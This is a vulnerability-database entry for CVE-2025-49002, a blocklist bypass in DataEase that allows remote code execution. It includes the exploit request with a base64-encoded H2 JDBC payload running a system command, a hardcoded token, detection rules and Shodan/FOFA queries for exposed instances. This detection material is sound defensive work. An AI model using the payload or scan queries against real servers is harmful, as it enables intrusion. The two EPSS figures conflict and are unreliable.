cbcvebase.
CVE-2025-49002
published 2025-06-03

CVE-2025-49002: DataEase is an open source business intelligence and data visualization tool. Versions prior to version 2.10.10 have a flaw in the patch for CVE-2025-32966…

PriorityP279critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
41.84%
98.5th percentile
DataEase is an open source business intelligence and data visualization tool. Versions prior to version 2.10.10 have a flaw in the patch for CVE-2025-32966 that allow the patch to be bypassed through case insensitivity because INIT and RUNSCRIPT are prohibited. The vulnerability has been fixed in v2.10.10. No known workarounds are available.

Affected

1 ranges
VendorProductVersion rangeFixed in
dataeasedataease< 2.10.102.10.10

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /de2api/datasource/getSchema HTTP/1.1
path/de2api/datasource/getSchema
cookieX-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
othereyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0O2luXFxpdD1EUk9QIEFMSUFTIElGIEVYSVNUUyBFWEVDXFw7Q1JFQVRcXEUgQUxJQVMgRVhFQyBBUyAkJHZvaWQgZXhlYygpIHRocm93cyBFeGNlcHRpb24ge2phdmEubGFuZy5TdHJpbmcgcyA9IG5ldyBqYXZhLnV0aWwuU2Nhbm5lcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhcImlkXCIpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlcihcIlxcQVwiKS5uZXh0KClcXDt0aHJvdyBuZXcgamF2YS5sYW5nLkV4Y2VwdGlvbihzKVxcO30kJFxcO0NBTEwgRVhFQygpXFw7IiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwiIHBhc3N3b3JkIjoiMTIzIiwiaG9zdCI6IiIsImF1dGhNZXRob2QiOiIiLCJwb3J0IjowLCJpbml0aWFsUG9vbFNpemUiOjUsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NSwicXVlcnlUaW1lb3V0IjozMH0
sigma
detection: keywords: - 'Exception calling' - 'exec():' condition: all of them
yara
rule CVE_2025_49002_DataEase_RCE { strings: $uid = /uid=[0-9]+.*gid=[0-9]+.*/ condition: $uid }
  • Exploit targets the POST /de2api/datasource/getSchema endpoint with a crafted H2 JDBC URL in the 'configuration' field (base64-encoded JSON) using mixed-case bypass of blocked keywords (e.g., 'in\it' instead of 'INIT', 'CREAT\E' instead of 'CREATE') to achieve RCE via H2 JDBC INIT parameter.
  • Successful exploitation is confirmed in the HTTP response body by the presence of both 'Exception calling' and 'exec():' strings, along with a Unix uid/gid output pattern matching uid=[0-9]+.*gid=[0-9]+.*, and HTTP 200 with Content-Type application/json.
  • The attacker supplies a hardcoded JWT token in the X-DE-TOKEN header (eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8) — monitor for this specific token value in HTTP request headers as a strong exploitation indicator.
  • FOFA and Shodan fingerprints for exposed DataEase instances: FOFA query app="FIT2CLOUD-DataEase"; Shodan query http.html:"DataEase".
  • The bypass works by obfuscating the H2 JDBC INIT keyword using backslash-insertion (in\it) and mixed-case (CREAT\E) to evade the blocklist that only prohibits exact-case 'INIT' and 'RUNSCRIPT'.
  • ·The Nuclei template is described as non-invasive and does NOT attempt authentication bypass, JDBC exploitation, or command execution — it only checks for exposed instances and version hints. The embedded payload in the template body is for reference/detection matching only.
  • ·No known workarounds are available for CVE-2025-49002; the only fix is upgrading to DataEase v2.10.10 or later.
  • ·The EPSS score is 0.26173 (96.31st percentile), indicating high likelihood of exploitation in the wild relative to other CVEs.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.2HIGHCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.